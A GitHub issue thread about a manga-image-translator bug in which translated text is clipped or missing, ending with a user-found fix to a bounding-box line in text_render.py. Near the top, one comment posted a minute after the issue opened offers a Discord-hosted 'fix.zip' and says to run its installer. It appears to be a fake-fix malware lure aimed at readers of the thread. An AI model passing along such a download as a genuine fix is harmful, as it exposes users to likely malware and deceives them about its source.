### ISSUE TITLE
[Bug]: The text often appears kinda off or is missing entirely.

### ISSUE THREAD

**Issue by BlaskKilt** [zyddnys/manga-image-translator#703] opened 2024-09-03 06:01 UTC
### Issue

The text often appears kinda off or is missing entirely. Is this considered normal? I have encircled the problematic areas in red. This issue does not seem to occur in manga2eng.

Is there a fix for this or commands to set as input? I'd be so much happy if someone helped me.

![8](https://github.com/user-attachments/assets/cc9b7eb3-aace-4de5-bc13-d0320f58df82)
![11](https://github.com/user-attachments/assets/b5b86601-9b07-4cea-81c0-f41c08e1dfbf)

**Comment by maher-nakesh** [comment] 2024-09-03 06:01
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by BlaskKilt** [comment] 2024-09-03 06:05
> try this https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538& select the desired compiler in the installer

Thank you so much but I'm using VPS is there counter-part to ubuntu as fix for this?

**Comment by grassmedico** [comment] 2024-09-30 09:51
maybe provide your prompt? or have you try changing the font yet?
mine dont have that problem

![az_pages-to-jpg-0010](https://github.com/user-attachments/assets/5746d90d-1a45-49d7-a090-c7fddd01b49f)
![az_pages-to-jpg-0010x](https://github.com/user-attachments/assets/35197227-49f6-4a23-b7d9-fa754825da92)

**Comment by BlaskKilt** [comment] 2024-10-07 14:23
> maybe provide your prompt? or have you try changing the font yet? mine dont have that problem
> 
> ![az_pages-to-jpg-0010](https://private-user-images.githubusercontent.com/179377058/372036416-5746d90d-1a45-49d7-a090-c7fddd01b49f.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjgzMTExMjMsIm5iZiI6MTcyODMxMDgyMywicGF0aCI6Ii8xNzkzNzcwNTgvMzcyMDM2NDE2LTU3NDZkOTBkLTFhNDUtNDlkNy1hMDkwLWM3ZmRkZDAxYjQ5Zi5qcGc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQxMDA3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MTAwN1QxNDIwMjNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT00YjNhMDk5NTBhYThkMjVkNDY5MmJmZWExMzYwNGY3MjgzMTAzZDg0NTE2ZTU1Nzc3OGNmMDhkODliMzAyODJlJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.7m3lHcctpRDx1t9kOCSYUaEC6JIOOjaSU0wYHmzSC8o) ![az_pages-to-jpg-0010x](https://private-user-images.githubusercontent.com/179377058/372036436-35197227-49f6-4a23-b7d9-fa754825da92.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjgzMTExMjMsIm5iZiI6MTcyODMxMDgyMywicGF0aCI6Ii8xNzkzNzcwNTgvMzcyMDM2NDM2LTM1MTk3MjI3LTQ5ZjYtNGEyMy1iN2Q5LWZhNzU0ODI1ZGE5Mi5qcGc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQxMDA3JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MTAwN1QxNDIwMjNaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT00MTlmNzc1MDlhOWFiOTE0NzgxMzFmY2I5OGExZjgwODgwMDJlMzEyODhkMGRkMThlMDQ2ODU2OTc1NDQ4NGY5JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.bUYHXcO6eNyipUk-fsNkjIfAJgNMrMizvRoku9g2oqg)



Here is my command python3 -m manga_translator -v --mode batch --font-size-minimum 14 --font-path fonts/anime_ace_3.ttf --upscale-ratio 2 --ocr mocr --detector ctd --ignore-errors --overwrite --translator=gpt4 -l ENG -i /root/9.3.24/Mezase_goka_kyakusen_Fune

**Comment by retol** [comment] 2024-10-23 20:48
It's not a problem with the font or input command, it's a problem with the program itself.
I had this problem after I updated all the files in Git to the latest version, and if I roll back to a previous version, the problem doesn't appear. I don't know what code does it, but after --force-horizontal processing, the right area is removed.

**Comment by DuckDuckGo-prog** [comment] 2024-10-25 17:46
I've been searching for a fix or temporary fix for this too kinda destroy's my reading not gonna lie , I hope someone fix this also

**Comment by DuckDuckGo-prog** [comment] 2024-10-25 17:51
> It's not a problem with the font or input command, it's a problem with the program itself. After updating all the files in Git to the latest version, I encountered the same issue, and I roll back to a previous version, the problem doesn't appear. I don't know what code does it, but after --force-horizontal processing, the right area is all removed.
> 
> I guess it probably specifies an invisible box area and deleting all text outside that area. This issue doesn't occur in vertical mode, but the readability in vertical mode is terrible 🥶 This bug is serious and needs to be fixed.

 I've been searching for a fix or temporary fix for this, too, kinda destroys my reading. I am not gonna lie, I hope someone fixes this also
 also, I'll be trying that --force-horizontal and see what it gets me

**Comment by DuckDuckGo-prog** [comment] 2024-10-25 17:58
> It's not a problem with the font or input command, it's a problem with the program itself. After updating all the files in Git to the latest version, I encountered the same issue, and I roll back to a previous version, the problem doesn't appear. I don't know what code does it, but after --force-horizontal processing, the right area is all removed.
> 
> I guess it probably specifies an invisible box area and deleting all text outside that area. This issue doesn't occur in vertical mode, but the readability in vertical mode is terrible 🥶 This bug is serious and needs to be fixed.

By the way what version do you roll back too been month's for me here when I tested this app now I'm stuck with the same problem

**Comment by retol** [comment] 2024-10-26 16:30
> By the way what version do you roll back too been month's for me here when I tested this app now I'm stuck with the same problem
The last working latest version was not backup when updated, so I don't have it. It was created several months after my current backup from 2024-Jan-05(This is the version that I have verified works normally when Rollback.)  So this bug hasn't been around that long. 

The problem is that after several attempts to fix this, running pip install requirements.txt, the environment is updated to the latest version and the older versions translator no longer run. I shouldn't have done this 😂

**Comment by DuckDuckGo-prog** [comment] 2024-10-26 17:28
> > By the way what version do you roll back too been month's for me here when I tested this app now I'm stuck with the same problem
> 
> The last working latest version was not backup when updated, so I don't have it. It was created several months after my current backup from 2024-Jan-05(This is the version that I have verified works normally when Rollback.) So this bug hasn't been around that long. The problem is that after several attempts to fix this, running pip install requirements.txt, the environment is updated to the latest version and the older versions translator no longer run. I shouldn't have done this 😂
> 
> https://drive.google.com/file/d/1zwVjvdW65PG075bu-qlYg9jMZ945h6gr/view?usp=drive_link If you are in a past state where you have not updated requirements, try this. However, this version is older than the latest version that worked normally, so the translation performance will be lower. it is recommended to use it only temporarily until the bug is fixed.

I rather trade lower performance rather than extra cancer reading 😂

**Comment by retol** [comment] 2024-10-27 09:42
> I rather trade lower performance rather than extra cancer reading 😂

Here's some good news.

https://github.com/zyddnys/manga-image-translator/forks?include=active&page=1

I'm not a developer so I didn't know, but here can access and download all the past commit forks. I was able to track down the past versions and finally find the cause of this trolling.

https://github.com/silverfantacy/manga-image-translator/commit/06538478826230ad5140c5063254a3b139fd7352
This was caused by a code change in the text_render.py file in this commit.

The solution is to change the code in line 740 of the [text_render.py] file from A to B.
--------------------------------------------
[A]
    if bg is None :
        x, y, w, h = cv2.boundingRect(canvas_text)
    else :
        x, y, w, h = cv2.boundingRect(canvas_border)
[B]
    x, y, width, height = cv2.boundingRect(canvas_border)
--------------------------------------------

This applies to the latest version as well, so to keep it clean, remove all translator files, download the latest file from github and apply that.

Or if you don't know how to apply this, download this patch file and overwrite it. Keep the folder structure.
https://drive.google.com/file/d/1Lfdrp-6HfoB6BmUdGcJws5dBAouFSKis/view?usp=drive_link

**Comment by retol** [comment] 2024-10-27 10:19
[A code]
![A](https://github.com/user-attachments/assets/f9d95943-b1f7-4e28-8a22-72fc89007c2a)
[B code]
![B](https://github.com/user-attachments/assets/c34cc750-e93d-483c-87e7-b294155054a2)

**Comment by DuckDuckGo-prog** [comment] 2024-10-27 19:16
> [A code] ![A](https://private-user-images.githubusercontent.com/39213035/380486717-f9d95943-b1f7-4e28-8a22-72fc89007c2a.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzAwNTY1MDQsIm5iZiI6MTczMDA1NjIwNCwicGF0aCI6Ii8zOTIxMzAzNS8zODA0ODY3MTctZjlkOTU5NDMtYjFmNy00ZTI4LThhMjItNzJmYzg5MDA3YzJhLmpwZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDEwMjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQxMDI3VDE5MTAwNFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPTI5Y2I0YzI4ZDMyZDNjZTI0NDAxMmI1ZWRhZmM0MzI1NGU1MTNjZjJhZTQyNjAyMTJmNjUyMDA0NzQ1MGJiYzkmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.zIIIHzeWMu-aClJA_nZZtKGuiHx0Ccypwpw1DGO9X4k) [B code] ![B](https://private-user-images.githubusercontent.com/39213035/380486725-c34cc750-e93d-483c-87e7-b294155054a2.jpg?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MzAwNTY1MDQsIm5iZiI6MTczMDA1NjIwNCwicGF0aCI6Ii8zOTIxMzAzNS8zODA0ODY3MjUtYzM0Y2M3NTAtZTkzZC00ODNjLTg3ZTctYjI5NDE1NTA1NGEyLmpwZz9YLUFtei1BbGdvcml0aG09QVdTNC1ITUFDLVNIQTI1NiZYLUFtei1DcmVkZW50aWFsPUFLSUFWQ09EWUxTQTUzUFFLNFpBJTJGMjAyNDEwMjclMkZ1cy1lYXN0LTElMkZzMyUyRmF3czRfcmVxdWVzdCZYLUFtei1EYXRlPTIwMjQxMDI3VDE5MTAwNFomWC1BbXotRXhwaXJlcz0zMDAmWC1BbXotU2lnbmF0dXJlPWJlZThjZWY1MmQxYzk0OWNiYjBiZGM2YjI4ZjU2MGZjNmEwZjA5MmFlYjc1MjgyOTMzNDI2YjQyYmQyOGZjOTAmWC1BbXotU2lnbmVkSGVhZGVycz1ob3N0In0.Pla4y_H2iWU2aERWreGLEl6JoV4bIzvfAjctUeai9Gw)

Not all heroes wear cape's It fixes my problem thank you much!

**Comment by popcion** [comment] 2024-10-31 19:02
> > I rather trade lower performance rather than extra cancer reading 😂
> 
> Here's some good news.
> 
> https://github.com/zyddnys/manga-image-translator/forks?include=active&page=1
> 
> I'm not a developer so I didn't know, but here can access and download all the past commit forks. I was able to track down the past versions and finally find the cause of this trolling.
> 
> [silverfantacy@0653847](https://github.com/silverfantacy/manga-image-translator/commit/06538478826230ad5140c5063254a3b139fd7352) This was caused by a code change in the text_render.py file in this commit.
> 
> ## The solution is to change the code in line 740 of the [text_render.py] file from A to B.
> ## [A]
> if bg is None :
> x, y, w, h = cv2.boundingRect(canvas_text)
> else :
> x, y, w, h = cv2.boundingRect(canvas_border)
> [B]
> x, y, width, height = cv2.boundingRect(canvas_border)
> This applies to the latest version as well, so to keep it clean, remove all translator files, download the latest file from github and apply that.
> 
> Or if you don't know how to apply this, download this patch file and overwrite it. Keep the folder structure. https://drive.google.com/file/d/1Lfdrp-6HfoB6BmUdGcJws5dBAouFSKis/view?usp=drive_link

Thanks a lot! It helps. I see a lot of people encounter this problem, not just for ENG translation.

**Closed** 2024-11-30 02:55 UTC
Labels: bug
